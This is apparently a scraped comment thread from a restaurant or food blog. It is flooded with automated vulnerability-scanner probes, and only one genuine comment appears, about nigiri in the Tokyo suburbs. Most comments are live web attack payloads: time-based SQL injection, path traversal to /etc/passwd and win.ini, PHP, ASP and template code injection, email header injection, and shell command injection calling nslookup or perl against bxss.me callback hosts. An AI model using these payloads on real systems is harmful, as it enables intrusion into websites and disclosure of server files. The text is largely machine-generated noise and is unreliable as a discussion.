unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Just_Ingest
<!--
re: Just_Ingest
${@print(md5(31337))}
re: Just_Ingest
WEB-INF/web.xml
re: Just_Ingest
${@print(md5(31337))}\
re: Just_Ingest
WEB-INF\web.xml
re: Just_Ingest
'.print(md5(31337)).'
re: Just_Ingest
1
re: Just_Ingest
1
re: Just_Ingest
-1 OR 2+205-205-1=0+0+0+1 --
re: Just_Ingest
-1 OR 3+205-205-1=0+0+0+1 --
re: Just_Ingest
-1 OR 2+245-245-1=0+0+0+1
re: Just_Ingest
-1 OR 3+245-245-1=0+0+0+1
re: Just_Ingest
-1' OR 2+57-57-1=0+0+0+1 --
re: Just_Ingest
-1' OR 3+57-57-1=0+0+0+1 --
re: Just_Ingest
-1' OR 2+70-70-1=0+0+0+1 or 'GPo3kS39'='
re: Just_Ingest
-1' OR 3+70-70-1=0+0+0+1 or 'GPo3kS39'='
re: Just_Ingest
-1" OR 2+358-358-1=0+0+0+1 --
re: Just_Ingest
-1" OR 3+358-358-1=0+0+0+1 --
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
z1JAZOmU'; waitfor delay '0:0:15' --
re: Just_Ingest
-5 OR 836=(SELECT 836 FROM PG_SLEEP(15))--
re: Just_Ingest
-5) OR 148=(SELECT 148 FROM PG_SLEEP(15))--
re: Just_Ingest
-1)) OR 605=(SELECT 605 FROM PG_SLEEP(15))--
re: Just_Ingest
CvIQMTl9' OR 266=(SELECT 266 FROM PG_SLEEP(15))--
re: Just_Ingest
d341Kexh') OR 612=(SELECT 612 FROM PG_SLEEP(15))--
re: Just_Ingest
8bqCXleu')) OR 162=(SELECT 162 FROM PG_SLEEP(15))--
re: Just_Ingest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@h9NmA
Thanks Justin for the link. Yes saw the tabelog reviews and the form of the nigiri looks very good. And being on Tokyo suburbs making it less touristy is very appealing to me.
Will review if I manage to get a reservation.
re: Yee How
3QWFvv5F
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+167-167-1=0+0+0+1
re: Yee How
-1 OR 3+167-167-1=0+0+0+1
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
x0HYylo8
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
1*
re: Yee How
-1 OR 2+733-733-1=0+0+0+1
re: Yee How
-1 OR 3+733-733-1=0+0+0+1
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
IyySpf7J'; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
-5 OR 889=(SELECT 889 FROM PG_SLEEP(15))--
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
-5) OR 104=(SELECT 104 FROM PG_SLEEP(15))--
re: Yee How
LeOOCzkZ'; waitfor delay '0:0:15' --
re: Yee How
-1)) OR 475=(SELECT 475 FROM PG_SLEEP(15))--
re: Yee How
-5 OR 359=(SELECT 359 FROM PG_SLEEP(15))--
re: Yee How
YIk27hLL' OR 159=(SELECT 159 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 335=(SELECT 335 FROM PG_SLEEP(15))--
re: Yee How
DjdTaJVb') OR 830=(SELECT 830 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 18=(SELECT 18 FROM PG_SLEEP(15))--
re: Yee How
Vdo4KYWj')) OR 17=(SELECT 17 FROM PG_SLEEP(15))--
re: Yee How
RETWnI52' OR 672=(SELECT 672 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
UE0uIpwF') OR 694=(SELECT 694 FROM PG_SLEEP(15))--
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
DG8dUinP')) OR 436=(SELECT 436 FROM PG_SLEEP(15))--
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
@@3uZVk
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@Lgq1q
re: Yee How
1qk3FQLpO
re: Yee How
response.write(9340483*9690957)
re: Yee How
'+response.write(9340483*9690957)+'
re: Yee How
"+response.write(9340483*9690957)+"
re: Yee How
%0abcc:074625.67-16666.67.b526f.19990.2@bxss.me
re: Yee How
to@example.com>%0d%0abcc:074625.67-16667.67.b526f.19990.2@bxss.me
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
${9999596+9999581}
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
file:///etc/passwd
re: Yee How
../../../../../../../../../../../../../../../proc/version
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Yee How
../../../../../../../../../../etc/passwd%00.jpg
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Yee How
'.gethostbyname(lc('hitwi'.'tpmpooacc35f4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(88).chr(115).chr(73).'
re: Yee How
)
re: Yee How
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Yee How
".gethostbyname(lc("hitwa"."klukoetzf6865.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(71).chr(122).chr(81)."
re: Yee How
!(()&&!|*|*|
re: Yee How
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Yee How
^(#$!@#$)(()))******
re: Yee How
/etc/passwd
re: Yee How
echo toqleu$()\ fsmfhm\nz^xyu||a #' &echo toqleu$()\ fsmfhm\nz^xyu||a #|" &echo toqleu$()\ fsmfhm\nz^xyu||a #
re: Yee How
%2fetc%2fpasswd
re: Yee How
&echo sxmjta$()\ cdppym\nz^xyu||a #' &echo sxmjta$()\ cdppym\nz^xyu||a #|" &echo sxmjta$()\ cdppym\nz^xyu||a #
re: Yee How
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Yee How
|echo hkpiti$()\ msgpnp\nz^xyu||a #' |echo hkpiti$()\ msgpnp\nz^xyu||a #|" |echo hkpiti$()\ msgpnp\nz^xyu||a #
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Yee How
(nslookup hitppnxenesyc1d1e8.bxss.me||perl -e "gethostbyname('hitppnxenesyc1d1e8.bxss.me')")
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Yee How
$(nslookup hitmkgzbefoge22a77.bxss.me||perl -e "gethostbyname('hitmkgzbefoge22a77.bxss.me')")
re: Yee How
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Yee How
&nslookup hitaeyrrjtktf6b7a9.bxss.me&'\"`0&nslookup hitaeyrrjtktf6b7a9.bxss.me&`'
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(115).concat(90).concat(106).concat(76)+(require"socket"
Socket.gethostbyname("hitxw"+"aenlckoofa3df.bxss.me.")[3].to_s)+"
re: Yee How
&(nslookup hitozibrudsrf1e068.bxss.me||perl -e "gethostbyname('hitozibrudsrf1e068.bxss.me')")&'\"`0&(nslookup hitozibrudsrf1e068.bxss.me||perl -e "gethostbyname('hitozibrudsrf1e068.bxss.me')")&`'
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Yee How
http://bxss.me/t/fit.txt%3F.jpg
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(115).concat(67).concat(97).concat(89)+(require'socket'
Socket.gethostbyname('hitbf'+'mjtnsdrc35296.bxss.me.')[3].to_s)+'
re: Yee How
|(nslookup hitmsdwaniydheb134.bxss.me||perl -e "gethostbyname('hitmsdwaniydheb134.bxss.me')")
re: Yee How
file:///etc/passwd
re: Yee How
/etc/shells
re: Yee How
`(nslookup hitcdcrumcfqu13f77.bxss.me||perl -e "gethostbyname('hitcdcrumcfqu13f77.bxss.me')")`
re: Yee How
/\../\../\../\../\../\../\../etc/passwd
re: Yee How
c:/windows/win.ini
re: Yee How
;(nslookup hityqgmwqcaip9feec.bxss.me||perl -e "gethostbyname('hityqgmwqcaip9feec.bxss.me')")|(nslookup hityqgmwqcaip9feec.bxss.me||perl -e "gethostbyname('hityqgmwqcaip9feec.bxss.me')")&(nslookup hityqgmwqcaip9feec.bxss.me||perl -e "gethostbyname('hityqgmwqcaip9feec.bxss.me')")
re: Yee How
/WEB-INF/web.xml
re: Yee How
bxss.me
re: Yee How
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Yee How
C:\WINDOWS\system32\drivers\etc\hosts
re: Yee How
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
../../../../../../../../../../windows/win.ini%00.jpg
re: Yee How
';print(md5(31337));$a='
re: Yee How
/../../../../../../../../../../boot.ini
re: Yee How
";print(md5(31337));$a="
re: Yee How
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Yee How
${@print(md5(31337))}
re: Yee How
'"
re: Yee How
..\..\..\..\..\..\..\..\windows\win.ini
re: Yee How
${@print(md5(31337))}\
re: Yee How
<!--
re: Yee How
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Yee How
'.print(md5(31337)).'
re: Yee How
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Yee How
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.